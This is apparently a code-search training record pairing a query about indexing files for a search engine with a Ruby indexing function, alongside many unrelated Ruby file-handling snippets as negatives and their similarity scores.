"def getFileAt(position)\n require 'rubygems/package'\n require 'zlib'\n\n @files = []\n f = File.new(@filename)\n tar_extract = Gem::Package::TarReader.new(f)\n tar_extract.rewind # The extract has to be rewinded after every iteration\n \n i = 0\n tar_extract.each do |entry|\n COURSE_LOGGER.log(entry)\n COURSE_LOGGER.log(i)\n\n if i == position then\n return nil, nil unless entry\n return entry.read, entry.full_name\n end\n\n i += 1\n end\n\n return nil, nil unless header\n\n rescue\n return nil, nil\n end",
"def index(data)\n indexH = Hash.new { |hash, key| hash[key] = [] }\n data.each_pair do |filename, tags|\n tags.each do |tag|\n if tag.is_a? Symbol\n indexH[tag] << filename\n elsif tag.is_a? Hash\n tag.each_pair do |sub_key, sub_value|\n #key = tag.keys.first\n #value = tag[key]\n value = sub_key\n indexH[sub_key] << sub_value #in case of project and sample it store (samples|projects) [(samples|projects)_name]\n indexH[sub_value]<< filename #stores for each (sample|project) name its filename so i can search directly for its name\n end\n end\n end #tags\n end #data\n indexH.each_pair do |key, value|\n indexH[key].uniq!\n end\n end",
"def get_file\n\t\t{\n\t\t\tfile_name: File.basename(file.path.to_s),\n\t\t\turl: file.url\n\t\t}\n\tend",
"def info(filename, nohash = nil)\n\tf = filename\n\tif test_file(f)\n\t\th = nohash ? (nil) : (Digest::SHA1.hexdigest(File.read(f)))\n\t\treturn [File.mtime(f), File.stat(f).mode.to_s(8).to_i, h]\n\tend\n\treturn []\nend",
"def files\n entries.map(&:filepath)\n end",
"def file_by_url(url)\n return file_by_id(url_to_id(url))\n end",
"def find_file_named name\n @files_hash[name]\n end",
"def read_filecache_index(filecache)\n CachedFile.reset_seq\n headers = []\n filecache.syswrite('ls')\n filecache.rewind\n filecache.each_line do |line|\n if line[0] == ?#\n headers = line.split\n headers.shift\n if headers[0] == 'filecache' then\n module_version = headers[1]\n end\n next\n end\n\n fields = {}\n tmp = line.split\n headers.each_index { |index| fields[headers[index]] = tmp[index] }\n\n file = fields['file']\n dev = fields['dev']\n next if file == '(noname)'\n if file.include? ?\\\\\n file.gsub! '\\011', \"\\011\" # ht\n file.gsub! '\\012', \"\\012\" # nl\n file.gsub! '\\040', \"\\040\" # sp\n file.gsub! '\\\\', \"\\\\\" # \\\n end\n\n if file =~ /\\([0-9a-f]{2}:[0-9a-f]{2}\\)/ then\n # handle block device\n # - transform file name from digital form to real ones\n fs = @@fstab[file.delete('(:)').hex]\n next unless fs\n file = fs.device_file\n dev = $BDEV_ID\n else\n # handle normal files\n # - expand file name to full path name\n # - ignore dirs/symlinks\n dev = dev[0,5].delete(':').hex\n fs = @@fstab[dev]\n next unless fs\n file = fs.mount_point + file unless fs.mount_point == '/'\n next unless File.file?(file)\n end\n\n cfile = CachedFile.new file\n cfile.dev = dev\n cfile.state = fields['state']\n cfile.ino = fields['ino'].to_i\n cfile.size = fields['size'].to_i\n cfile.cached = fields['cached'].to_i\n cfile.cachedp = fields['cached%'].to_i\n cfile.refcnt = fields['refcnt'].to_i\n cfile.process = fields['process']\n cfile.uid = fields['uid'].to_i\n cfile.accessed = fields['accessed'].to_i\n @cfile_by_name[file] = cfile\n end # filecache.each_line\n end",
"def files_hashs\n @files.map do |file|\n hash = case file\n when String\n { url: file }\n when Hash\n file.dup\n else\n raise ArgumentError, 'files must be an Array of Stings or Hashs'\n end\n\n hash[:local_path] = local_path\n hash\n end\n end",
"def fetch(filename, filesize)\n end",
"def get_file_for_url(url, params)\n selected_files = params[\"selected_files\"].values\n return unless selected_files.map { |a| a[\"url\"] }.include?(url)\n selected_files.select { |a| a[\"url\"] == url }.first[\"file_name\"]\n end",
"def files_hash\n @files_hash\n end",
"def file(fname)\n @file_list[fname]\n end",
"def file_names\n names = []\n frm.table(:class=>/listHier lines/, :text=>/Title/).rows.each do |row|\n next if row.td(:class=>\"specialLink\").exist? == false\n next if row.td(:class=>\"specialLink\").link(:title=>\"Folder\").exist?\n names << row.td(:class=>\"specialLink\").link(:href=>/access.content/, :index=>1).text\n end\n return names\n end",
"def read_summary(fname)\n hash={}\n # Read file\n File.open(fname,'r') do |f|\n # Loop over line\n f.each_line do |line|\n line.chomp!\n index,content = line.split(/\\s*==\\s*/)\n hash[index] = content # index:id, content:path\n end\n end\n return hash\nend",
"def find_nth_file(basename, index = T.unsafe(nil)); end",
"def file_list\n end",
"def files\n array = []\n @list.each do |k,v|\n array += v.filename\n end\n array\n end",
"def get_files(version)\n my_state = get_state(version)\n my_files = {}\n\n my_state.each do |digest, filepaths| # filepaths is [Array]\n filepaths.each do |logical_filepath|\n # look up this file via digest in @manifest.\n physical_filepath = @manifest[digest]\n # physical_filepath is an [Array] of files, but they're all the same so only need 1.\n my_files[logical_filepath] = physical_filepath[0]\n end\n end\n my_files\n end",
"def analyze_404\n selected_files.each do |file_name|\n result = [file_name[0,6], 0, 0]\n url = ''\n File.readlines(file_name).each do |line|\n if m = /Started(.*?)for/.match(line)\n url = m[1]\n end\n if m = /404/.match(line)\n p url.gsub('\"','')\n end\n end\n end\nend",
"def file\n file_names[x]\n end",
"def files\n list = []\n if @data['info'].key?('files')\n @data['info']['files'].each do |file|\n list << { 'name' => file['path'], 'length' => file['length'] }\n end\n return list\n end\n\n if @data['info'].key?('name') && @data['info'].key?('length')\n list << { 'name' => @data['info']['name'], 'length' => @data['info']['length'] }\n end\n list\n end",
"def get_list_file(url)\n\t\tdownload_html_file(url)\n\t\tdoc = Nokogiri::HTML(File.new(@tmp_html))\n\n\t\tlist = []\n\t\t# Parsing each link to find the relevant one\n\t\tdoc.css('a[@href!=\"../\"]').each do |link|\n\t\t\tlist << {\n\t\t\t\t'name' => link.text,\n\t\t\t\t'url' => link['href']\n\t\t\t}\n\t\tend\n\t\treturn list\n\tend",
"def get_file_path(v1_url)\n store.get(table_key + '_path', v1_url)\n end",
"def get_file_from_url(url)\n return $db.execute(\"SELECT * FROM files WHERE unique_url = ?\", url)[0]\nend",
"def retrieve_files_in_main_dir\n ensure_file_open!\n @file.glob('*').map do |entry|\n next if entry.directory?\n\n entry_file_name = Pathname.new(entry.name)\n [entry_file_name, entry.get_input_stream(&:read)]\n end.compact.to_h\n end",
"def file_info bucket_name, filename\n body_wrap = b2_list_file_names bucketId: (bucket_id bucket_name: bucket_name), maxFileCount: 1, startFileName: filename\n files_hash = body_wrap.files\n raise NotFound, \"#{filename} not found\" unless files_hash.size == 1\n files_hash.first\n end",
"def files\n db = Database.find(params[:id])\n @files = Dir.entries(db.path)\n @files.delete_if{|f| !f.include?'.dat'}\n @results = []\n @files.each do |entry|\n @results << {:name=>entry,:version=>db.version}\n end\n respond_to do |format|\n format.html\n format.json { render json: @results }\n end\n end",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def fileid_and_filename(url)\n url.split('/').slice(-2,2) || ['', '']\n end",
"def get_file_data(key, &block)\n paths = get_paths(key) or return nil\n paths.each do |path|\n begin\n sock = http_read_sock(URI.parse(path))\n begin\n return yield(sock) if block_given?\n return sysread_full(sock, sock.mogilefs_size, @get_file_data_timeout)\n ensure\n sock.close rescue nil\n end\n rescue MogileFS::Timeout, MogileFS::InvalidResponseError,\n Errno::ECONNREFUSED, EOFError, SystemCallError\n end\n end\n nil\n end",
"def file_hash\n return @file_hash\n end",
"def get_file_details(id)\n uri = ENDPOINT + \"file/details/#{key}/#{id}\"\n data = JSON.parse(self.class.get(uri).body, :symbolize_names => true)\n Reach::Helper::convert_keys(data)\n end",
"def get_url_for_filename(filename, params)\n selected_files = params[\"selected_files\"].values\n selected_files.select { |a| a[\"file_name\"] == filename }.first[\"url\"]\n end",
"def filenames\n file_stats.map(&:filename)\n end",
"def listFileHashes\n return contentHost.listFileHashes(baseDir)\n end",
"def [](index_value)\n if index_value.is_a?(Fixnum)\n self.fetch(index_value)\n else\n self.select { |a| a.filename == index_value }.first\n end\n end",
"def filenames; end",
"def get_file(url)\n get(url).body\n end",
"def get_file_list(sequence_type,site_name)\n\n case sequence_type\n when 'asm'\n ftp_url = \"#{FTP_BASE_URLS['asm']}/#{site_name}/\"\n\n # get a file list from the FTP directory listing\n LOG.info \"Checking file list on FTP server at #{ftp_url} ...\"\n curl_res = `curl -l --progress-bar #{ftp_url}`\n print \"\\n\"\n\n file_list = curl_res.split(/\\n/).map { |f| \"#{ftp_url}#{f}\" }\n when 'rrna'\n require 'csv'\n ftp_url = \"#{FTP_BASE_URLS['rrna']}/\"\n\n # parse sample IDs from TSV sample ID map\n # linked from http://hmpdacc.org/micro_analysis/microbiome_analyses.php\n sample_ids_url = \"#{CONF_DIR}/ppAll_V35_map.txt\"\n file_list = CSV.new(File.open(sample_ids_url), { :headers => :first_row, :col_sep => \"\\t\" })\n .select { |line| line[-3] == site_name.capitalize && line[5] != 'Unavailable' }\n .map { |line| \"#{ftp_url}#{line[7]}.fsa.gz\" }\n .sort\n .uniq\n else\n raise \"Unknown sequence type '#{sequence_type}' requested.\"\n end\n\n file_list\n\nend",
"def file_list\n @file_list\n end",
"def [](index_value)\n if index_value.is_a?(Integer)\n self.fetch(index_value)\n else\n self.select { |a| a.filename == index_value }.first\n end\n end",
"def files; end",
"def files; end",
"def files; end",
"def files; end",
"def files; end",
"def files; end",
"def file_data\n @client.get_file @file_url\n end",
"def _get_file(name)\n File.read(\"%s/%s\" % [uri, name])\n end",
"def index_dump\n { id => {\n \"name\" => name,\n \"file\" => filepath.relative_path_from(Dixi.contents_dir).to_s,\n \"type\" => type,\n }\n }\n end",
"def filedocer\n suid = file_id\n Cofile.find(:all, :select => \"name\", :conditions => {:id => suid}).map(&:name)\nend",
"def files\n return get_result('files')\n end",
"def file_get_more_information(directory) \n @files = []\n @file_information = {} # {\"/directory\"=>[\"file\"], \"/directory/directory\"=>[\"file\", \"file\"]\n directory = \"#{@current_directory}/#{directory}\" unless @current_directory == \"\"\n @current_directory = directory \n Dir.chdir(\"#{directory}\") \n Dir.foreach(\"#{directory}\") { |d| @files.push(d) unless d == \".\" || d == \"..\" }\n @file_information.store(directory, @files)\n @files = []\n return @file_information\n end",
"def access_file_name\n end",
"def files\n info[\"Files\"].to_a\n end",
"def files\n results\n rescue ApiStruct::EntityError\n result\n end",
"def url_for_file(filename, anchor = T.unsafe(nil)); end",
"def get_player_hash(id)\n output = {}\n file_array = []\n File.open(\"#{get_tourney_dir(id)}/playerindex\", \"r\") do |f|\n file_array = f.read.split\n end\n file_array.each_with_index do |name, index|\n output[file_array[index]] = file_array[index+1] if index % 2 == 0\n end\n puts output\n return output\nend",
"def read_by_filename(filename)\n result = find_by_filename(filename)\n \n if result.count > 1\n result.map! { |r| read(r['_id']) }\n else\n result.blank? ? [] : [read(result.first['_id'])]\n end\n end",
"def getFile(file)\n return fileByName.fetch(file, nil)\n end",
"def iterate_over_file_paths\n parsed_file.each do |hit|\n file_path_array << hit[0]\n end\n file_path_array\n end",
"def extract\n entries.map(&:pathname)\n end",
"def find_file_named name\n @store.find_file_named name\n end",
"def get_file(file_id, file_type)\n\t\tresponse = self.auth_get(\"/weboncampus/getFile.do?tipo=#{file_type}&id=#{file_id}\")\n\t\tfilename = response[\"content-disposition\"].match(/filename=\"(.*)\"/)[1]\n\t\tlength = response[\"Content-Length\"]\n\t\treturn filename, length, response.body\n\tend",
"def file_hashes\n @file_hashes ||= file_field_sets.map do |file_field_set|\n instantiation_fields, file_fields = file_field_set.partition do |field|\n instantiation_header?(field.header)\n end\n\n file_hash = fields_to_hash(file_fields)\n file_hash['files'] = [fields_to_hash(instantiation_fields)]\n\n file_hash\n end\n end",
"def index\n @filenames = Filename.all\n end",
"def process_data(base_uri, file_name)\n puts \"\\tprocess_data(#{file_name})\"\n\n links = []\n\n ext = parser.get_extension(base_uri)\n if ext == '.css'\n # CSS\n links = parser.get_links_from_css file_name\n elsif ext == '.js'\n # JS\n links = parser.get_links_from_js file_name\n elsif %w{ .gif .png .jpg .jpeg .ico }.include? ext\n # skip\n else\n # HTML\n links = parser.get_links_from_html file_name\n end\n\n links.inject([]) do |memo, link|\n uri = build_uri(base_uri, link)\n memo << uri if uri\n memo\n end\n end",
"def files\n @files=get_endpoint('extra').keys\n end",
"def get_file_hash(fullPath)\n contents = File.read(fullPath)\n fileHash = Digest::MD5.hexdigest(contents)\n return fileHash\nend",
"def filenames\n files.map(&:filename)\n end",
"def filenames\n files.map(&:filename)\n end",
"def filenames\n files.map(&:filename)\n end",
"def file_url\n end",
"def get_digest(file, version)\n # Make a hash with each individual file as a key, with the appropriate digest as value.\n inverted = get_state(version).invert\n my_files = {}\n inverted.each do |files, digest|\n files.each do |i_file|\n my_files[i_file] = digest\n end\n end\n # Now see if the requested file is actually here.\n unless my_files.key?(file)\n raise OcflTools::Errors::FileMissingFromVersionState, \"Get_digest can't find requested file #{file} in version #{version}.\"\n end\n\n my_files[file]\n end",
"def files\n return [] unless meta?\n filename = meta['path'] + '/' + meta['filename']\n [\n Inch::Utils::CodeLocation.new('', filename, meta['lineno'])\n ]\n end",
"def get_file(url, filename, headers = {})\n request(:get, url, headers, :file => filename)\n end",
"def get_file(url, filename, headers = {})\n request(:get, url, headers, :file => filename)\n end",
"def file_entry(ref, identifier)\n out = ref[\"attachment\"] ? ref[\"fileref\"] : File.basename(ref[\"fileref\"])\n ret = if ref[\"fileref\"]\n { type: \"fileref\", ref: @documents[identifier].file,\n rel_path: ref[\"fileref\"], out_path: out }\n else { type: \"id\", ref: ref[\"id\"] } end\n %w(attachment sectionsplit index presentation-xml\n bare-after-first).each do |s|\n ret[s.gsub(\"-\", \"\").to_sym] = ref[s] if ref[s]\n end\n ret.compact\n end",
"def extract_files(hash)\n if hash['files']\n files = hash['files'].flatten.map do |file_hash|\n {\n :name => file_hash['path'].last,\n :size => file_hash['length']\n }\n end\n else\n files = [{\n :name => file_hash['name'],\n :size => file_hash['length']\n }]\n end\n end",
"def files\n i = 0\n @@arr_path.each do |path|\n if path.include?(params[:fold])\n # Remove path from current path\n @@arr_path = @@arr_path[0..i]\n @path = ''\n\n @@arr_path.each do |e| # Put path from array to @path\n @path = @path + e + ' >> '\n end\n @@temp_path = @path\n\n # Get content: folders, file, count\n @content = BrowsingFile.bind_folder params[:fold]\n @file = BrowsingFile.bind_files params[:fold]\n\n render 'index' # Reload index page\n return\n end\n i += 1\n end\n end",
"def to_hash\n return @file_table\n end",
"def source_index_hash\n result = {}\n sources.each do |source|\n\tresult[source] = fetch_source(source)\n end\n @fetcher_class.finish\n result\n end",
"def simsat_create_file_hash(fm_dir_file)\n \n file_hash = {}\n \n dir_file = File.open(fm_dir_file,'r')\n \n file_hdr = dir_file.read(CfeFile::HDR_LEN)\n\n if file_hdr[0..3] == CfeFile::CONTENT_ID\n \n fm_hdr = dir_file.read(FswConfigParam::FM_DIR_FILE_HDR_LEN)\n \n if fm_hdr[0..SimSat::FLT_REC_DIR.length-1] == SimSat::FLT_REC_DIR\n \n num_files = fm_hdr[68..71].to_s.unpack('l')\n \n files = []\n num_files[0].times do\n file_rec = dir_file.read(FswConfigParam::FM_DIR_FILE_REC_LEN)\n file_ext_index = file_rec[0..63].index('.')\n file_name = file_rec[0..file_ext_index+3].to_s\n files << file_name\n end\n \n file_hash[:event] = files.grep /^#{SimSat::EVENT_FILENAME_BASE}/\n file_hash[:sci_aux] = files.grep /^#{SimSat::SCI_AUX_FILENAME_BASE}/\n file_hash[:isim] = files.grep /^#{SimSat::ISIM_FILENAME_BASE}/\n\n else\n\n message_box(\"FM file header does not contain the expected directory #{SimSat::FLT_REC_DIR}\",false)\n \n end\n \n else\n \n message_box(\"File header does not contain cFE file identifier #{CfeFile::CONTENT_ID}\",false)\n\n end\n \n return file_hash\n \nend",
"def open_index_file\n end",
"def files\n @files.values\n end",
"def get_file(filename, branch_or_tag='master') \n\t\tlog = repo.log(branch_or_tag, filename) \n\t\treturn log.first.tree.contents.first.data\n\tend",
"def hash\n return (path + file_id.to_s).hash\n end",
"def get_imageinfo(files,props = :imageinfo)\n result=Array.new\n \n iiprop=CGI.escape(\"timestamp|user|url|dimensions|comment\")\n doc=Nokogiri::XML(open(\"http://commons.wikipedia.org/w/api.php?format=xml&action=query&prop=#{props.to_s}&titles=#{files}&iiprop=#{iiprop}\"))\n\n xp=\"//api/query/pages/page/imageinfo/ii\"\n xp=\"//api/query/pages/page/globalusage/gu\" if props==:globalusage\n\n ctr=0\n element=doc.xpath(xp).each do |element| \n img=Hash.new\n element.attributes.each do |a|\n img[a[0].to_sym]=element.get_attribute(a[0])\n end \n result << img\n \n @stockpile[\"#{@imagelist[ctr]}\"]=Hash.new unless @stockpile[\"#{@imagelist[ctr]}\"]\n @stockpile[\"#{@imagelist[ctr]}\"][props]=img\n ctr=ctr+1\n end\n result\n end",
"def buildCodeFilesHashFromFiles()\n\t\tdir = @cacheDirPath \n\t\tfilesList = Dir.glob(dir + \"**/*\").select{|e| File.file? e}\n\t\tfilesList.map.with_index{|file,index|\n\t\t\t#p \"cacheFile: \" + index.to_s if index % 1000 == 0\n\t\t\tp \"cacheFile: \" + index.to_s \n\t\t\tfilePath = dir + index.to_s + \".yaml\"\n\t\t\tfile = File.read(filePath)\n\t\t\tYAML.load(file)\n\t\t}.to_h\n\tend",
"def file_info(path)\n if manifest_entry # have we loaded our manifest yet? if so, use that sucker\n result = [manifest_entry[path], manifest_entry.flags[path]]\n if result[0].nil?\n return [NULL_ID, '']\n else\n return result\n end\n end\n if manifest_delta || files[path] # check if it's in the delta... i dunno\n if manifest_delta[path]\n return [manifest_delta[path], manifest_delta.flags[path]]\n end\n end\n # Give us, just look it up the long way in the manifest. not fun. slow.\n node, flag = @repo.manifest.find(raw_changeset[0], path)\n if node.nil?\n return [NULL_ID, '']\n end\n return [node, flag]\n end",
"def getFileValue(rootDir, keyword, delegates=Array.new)\n files = Dir[\"#{rootDir}/*\".gsub(\"//\",\"/\")]\n\n files.each do |file|\n if File.directory? file\n delegates = getFileValue(file, keyword, delegates) \n else\n basename = File.basename(file)\n if basename.downcase.start_with? keyword.downcase\n delegates.push file \n end\n end\n end\n return delegates\nend",
"def file(name)\n begin\n @name=name\n @content=get_rest(\"extra/#{@name}\")\n rescue Stingray::NotFoundError \n nil\n end\n end",
"def filename\n self.class.path(hash)\n end",
"def get_file_data files, suffix_pattern = \"\\.fastq\\.gz\"\n files = [files].flatten\n\n $NAME_PATTERN = /(.*)_S(\\d+)_L(\\d{3})_R(\\d)_(\\d{3})#{suffix_pattern}/\n # L1401_S1_L001_R1_001.fastq.gz\n # $1 = \"L1401\"\n # $2 = \"1\"\n # $3 = \"001\"\n # $4 = \"1\"\n # $5 = \"001\"\n\n sample_sheet_data = get_sample_sheet_data()\n\n\n file_data = files.collect do |file|\n base_name = File.basename(file)\n match = base_name =~ $NAME_PATTERN\n raise \"ERROR: #{file} does not match expected file name pattern\" unless match\n data = {:name => base_name, :path => file,\n :sample_name => $1, \n :lane => $3.to_i, :read => $4.to_i, :set => $5.to_i}\n barcode = sample_sheet_data[\"samples\"][$2.to_i - 1][\"index\"]\n\n if !(barcode =~ /([ATCGN]+|NoIndex|Undetermined)/)\n raise \"ERRROR: invalid barcode for sample: #{barcode}\"\n end\n data[:barcode] = barcode\n\n puts data.inspect\n data\n end\n file_data\n end",
"def files\n entries.map{ |f| FileObject[path, f] }\n end"
] | [
"0.63250715",
"0.63250715",
"0.6083411",
"0.60423857",
"0.6021029",
"0.59970486",
"0.59480125",
"0.5919553",
"0.5890083",
"0.58740073",
"0.5828078",
"0.58234",
"0.5817403",
"0.5815732",
"0.5810775",
"0.5804879",
"0.57983625",
"0.57846576",
"0.57770556",
"0.57633716",
"0.5763195",
"0.5760864",
"0.57569325",
"0.5733774",
"0.5731734",
"0.57215816",
"0.57215476",
"0.5700388",
"0.5698739",
"0.56843364",
"0.5669725",
"0.5648961",
"0.5648961",
"0.5647761",
"0.5631156",
"0.56240416",
"0.5590306",
"0.55805886",
"0.55802965",
"0.55795026",
"0.5575696",
"0.5561248",
"0.55455697",
"0.55447865",
"0.5534414",
"0.5526493",
"0.5515758",
"0.5515758",
"0.5515758",
"0.5515758",
"0.5515758",
"0.5515758",
"0.55114263",
"0.54935706",
"0.54903334",
"0.5487044",
"0.54740393",
"0.546198",
"0.5448403",
"0.54423165",
"0.54375595",
"0.5413837",
"0.5409548",
"0.5401282",
"0.539491",
"0.5377214",
"0.53734505",
"0.53699946",
"0.53668904",
"0.536392",
"0.5349458",
"0.53458",
"0.5339828",
"0.5338771",
"0.53345054",
"0.53345054",
"0.53345054",
"0.5330442",
"0.532963",
"0.5327315",
"0.53265387",
"0.53265387",
"0.53261393",
"0.532144",
"0.5320939",
"0.53191715",
"0.53134507",
"0.5313128",
"0.53087395",
"0.53069305",
"0.5301777",
"0.5298782",
"0.5284508",
"0.5279957",
"0.5274682",
"0.52717227",
"0.5268435",
"0.5262088",
"0.52584094",
"0.525813"
] | 0.6574043 | 0 |
index_file takes a file and performs the necessary tasks to index that file in the search engine | def index_file(file, pages_dir, stopwords, file_data)
# Removing the dir from the file name
# begin
actual_name = file.gsub(pages_dir, "")
# rescue NoMethodError
# actual_name = badpage.html
# Resetting the file path
file_path = ""
file_path = File.expand_path(".") + "/" + file
print "Parsing HTML document: " + actual_name + " \n"
# Finding all the tokens in the file
tokens = find_tokens(file_path)
# Getting the page title, word count, and page url
page_title = get_title(file_path)
word_count = tokens.length
page_url = file_data[actual_name]
# Updating the docindex hash
$docindex[file.gsub(pages_dir, "")] = [word_count, page_title, page_url]
# Removing the stop words and getting the stem words in the file
tokens = remove_stop_tokens(tokens, stopwords)
tokens = stem_tokens(tokens)
# Creating the invindex hash table
for token in tokens
begin
if $invindex.member?(token)
if $invindex[token].member?(actual_name)
$invindex[token][actual_name] += 1
else
$invindex[token][actual_name] = 1
end
else
$invindex[token] = {actual_name => 1}
end
# end
# rescue NoMethodError
# puts "NoMethodError"
end
#puts file_name
# title = nil
end
#end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def open_index_file\n end",
"def open_index_file\n @index = File.open(@index_path, 'rb')\n end",
"def index\n # Block if this file is currently being indexed by another thread/process\n if indexing?\n while indexing?\n sleep 1\n end\n else\n self.indexing = true\n \n begin\n # Filter unparseable entries\n # TODO: Find a more efficient way to filter unparseable entries without\n # having to copy the entire file line by line\n filtered = 0\n File.open(@filtered_file, 'w') do |f|\n File.foreach(@data_file) do |line|\n begin\n parse(line)\n f.write line\n rescue\n filtered += 0\n end\n end\n end\n puts \"Filtered #{filtered} unparseable entries\" if filtered > 0 and ENV['DEBUG']\n \n # File must be sorted\n File.sort(@filtered_file, @sorted_file, \"-k#{@chr_col},#{@chr_col} -k#{@start_col},#{@start_col}n\")\n \n # and BGZipped\n BGZip.compress(@sorted_file, @bgzipped_file)\n \n # Now Tabix can index it\n Tabix.index(@bgzipped_file, @chr_col, @start_col, @end_col)\n rescue\n raise EntryFileError, \"Error indexing file #{File.basename(@data_file)} for lookup!\"\n ensure\n # Delete the temporary filtered and sorted files since they are unneeded\n File.delete(@filtered_file) if File.exist?(@filtered_file)\n File.delete(@sorted_file) if File.exist?(@sorted_file)\n self.indexing = false\n end\n end\n end",
"def index(file, needle, encoding = nil, *args, &block)\n\n file = init_file(file, encoding)\n\n # pass to scan method\n scan(file, needle, *args, &block)\n end",
"def index(file_rec)\n @index_driver.index(file_rec)\n end",
"def initialize (filename)\n @indexname = filename + \".index\" \n @data_f = File.open(filename)\n load_index \n end",
"def load_index\n construct_index unless index_valid?\n open_index_file\n end",
"def process_input_file\n\t\t\tinput_file = File.open(@params[:input_file], 'r')\n\t\t\tfile_terms = convert_contents_to_search_string(input_file.read)\n\t\t\tadd_terms(file_terms)\n\t\tend",
"def index(data_path, db_path)\n db = Xapian::WritableDatabase.new(db_path, Xapian::DB_CREATE_OR_OPEN)\n term_generator = Xapian::TermGenerator.new\n term_generator.stemmer = Xapian::Stem.new('en')\n parse_csv_file(data_path).each do |row|\n doc = Xapian::Document.new\n term_generator.document = doc\n term_generator.index_text(row['TITLE'].to_s, 1, 'S')\n term_generator.index_text(row['DESCRIPTION'].to_s, 1, 'XD')\n term_generator.index_text(row['TITLE'].to_s)\n term_generator.increase_termpos\n term_generator.index_text(row['DESCRIPTION'].to_s)\n\n ### Start of new indexing code.\n # Index the MATERIALS field, splitting on semicolons.\n row['MATERIALS'].to_s.split(';').each do |material|\n material.strip!\n material.downcase!\n doc.add_boolean_term(\"XM#{material}\") if material.length.positive?\n end\n ### End of new indexing code.\n\n doc.data = row.to_h.to_json\n idterm = \"Q#{row['id_NUMBER']}\"\n doc.add_boolean_term(idterm)\n db.replace_document(idterm, doc)\n end\nend",
"def index_pages\n debug_msg \" generating pages search index\"\n\n pages = @files.select do |file|\n file.text?\n end\n\n pages.each do |page|\n debug_msg \" #{page.page_name}\"\n record = page.search_record\n @index[:searchIndex] << search_string(record.shift)\n @index[:longSearchIndex] << ''\n record.shift\n @index[:info] << record\n end\n end",
"def initialize(index_file = INDEX_FILE)\n @terms = {}\n @index = {}\n @index_file = index_file\n if File.exists? @index_file\n @terms, @index = Marshal.load(\n File.open(@index_file, 'rb') {|f| f.read})\n end\n end",
"def build_index\n @search = RSemantic::Search.new(@documents.map(&:text), @options)\n end",
"def initialize (filename)\n @indexname = filename + \".index\" \n @data_f = File.open(filename, \"w\")\n @index_f = File.open(@indexname, \"w\") \n @cur_num = 0 \n @cur_pos = @data_f.pos # 0\n end",
"def load_index_cache(file)\n @indexes = Marshal.load(File.read(file))\n nil\n end",
"def initialize(file)\n Phobius.default_index(file, self)\n end",
"def create_index( dictionary )\n\n\t# test the existence of the index, and exit\n\tFile.stat( dictionary.index )\n\n\t# unless there is an error, so\n\trescue\n\n\t# 1 - it creates the index\n\tFile.open( dictionary.index, \"a\" ) do |index_file|\n\t\t# 2 - it opens the dictionary\n\t\tFile.open( dictionary ) do |dictionary_file|\n\t\t\t# 3 - for each word of the dictionary\n\t\t\tdictionary_file.readlines.each do |dictionary_line|\n\t\t\t\t# 4 - puts in the index the canonical form\n\t\t\t\tindex_file.puts dictionary_line.chomp.canonical\n\t\t\tend\n\t\tend\n\tend\nend",
"def transform index_file\n InputBatch.log.info \"Opened txt file for processing\"\n puts \"Opened txt file for processing\"\n InputBatch.log.info \">>Index Transformation Starts \" + Time.now.to_s\n puts \">>Index Transformation Starts \" + Time.now.to_s\n @jobs = []\n @txt_lines = File.readlines(index_file)\n txt_lines.each do |row|\n @row = row.chomp\n save_records\n end\n\n puts \">>Index Transformation Ends \" + Time.now.to_s\n InputBatch.log.info \">>Index Transformation Ends \" + Time.now.to_s\n end",
"def build_index\n say \"Building index...\"\n\n # Get size in bytes, so we know when we've hit the end.\n file_size = File.size(@filename)\n CSV.open(@filename, :encoding => 'utf-8', :headers => true) do |csvin|\n\n # Get byte offset\n line_start = csvin.tell\n\n # Then read line\n count = 0\n while((line_start = csvin.tell) < file_size) do\n\n # Load the line\n line = csvin.shift()\n\n # Load the key up to the key size only\n key = get_minimal_key(line)\n \n # Save the file offset\n # TODO: ensure random access of the cache is possible\n $stderr.puts \"WARNING: Key at byte #{line_start} of #{@filename} collides with key at byte #{@cache[key]}.\" if @cache[key]\n @cache[key] = line_start\n\n print \"\\rLine: #{count+=1} \"\n end\n end\n print \"\\n\"\n \n say \"Finished building index\"\n end",
"def phrender_index_file(index_file_path = nil)\n @phrender_index_file = index_file_path || @phrender_index_file\n end",
"def index_one(book_name)\n\n file = File.open( @dir_path+book_name, \"r\")\n\n puts \"Indexing #{book_name}\"\n file.each_line do |line|\n words = line.split\n words.each do |word|\n word = word.gsub(/[;.\"\"...,()?!*]+/i, \"\").downcase\n @connection.query(\"INSERT INTO #{@table_name} (word, count) VALUES ('#{@connection.escape(word)}', 1) ON DUPLICATE KEY UPDATE count=count+1\")\n\n end\n end\n\n puts \"Indexed #{book_name}\"\n end",
"def index_csv(data_path, db_path)\n db = Xapian::WritableDatabase.new(db_path, Xapian::DB_CREATE_OR_OPEN)\n term_generator = Xapian::TermGenerator.new\n term_generator.stemmer = Xapian::Stem.new('en')\n parse_csv_file(data_path).each do |row|\n doc = Xapian::Document.new\n term_generator.document = doc\n term_generator.index_text(row['TITLE'].to_s, 1, 'S')\n term_generator.index_text(row['DESCRIPTION'].to_s, 1, 'XD')\n term_generator.index_text(row['TITLE'].to_s)\n term_generator.increase_termpos\n term_generator.index_text(row['DESCRIPTION'].to_s)\n doc.data = row.to_h.to_json\n idterm = \"Q#{row['id_NUMBER']}\"\n doc.add_boolean_term(idterm)\n db.replace_document(idterm, doc)\n end\nend",
"def load_index_file(index_filename)\n # Look for an index. If it is found, load it and use it.\n return unless File.readable?(index_filename)\n Pocolog.info \"loading file info from #{index_filename}... \"\n index_data = File.open(index_filename).read\n file_info, stream_info =\n begin Marshal.load(index_data)\n rescue Exception => e\n if e.kind_of?(Interrupt)\n raise\n else\n raise InvalidIndex, \"cannot unmarshal index data\"\n end\n end\n\n if file_info.size != @io.size\n raise InvalidIndex, \"invalid index file: file set changed\"\n end\n coherent = file_info.enum_for(:each_with_index).all? do |(size, time), idx|\n size == File.size(@io[idx].path)\n end\n if !coherent\n raise InvalidIndex, \"invalid index file: file size is different\"\n end\n\n stream_info.each_with_index do |info, idx|\n\t\tif(!info.respond_to?(\"version\") || info.version != StreamInfo::STREAM_INFO_VERSION || !info.declaration_block)\n\t\t raise InvalidIndex, \"old index file found\"\n\t\tend\n\n @rio, pos = info.declaration_block\n if read_one_block(pos, @rio).type != STREAM_BLOCK\n raise InvalidIndex, \"invalid declaration_block reference in 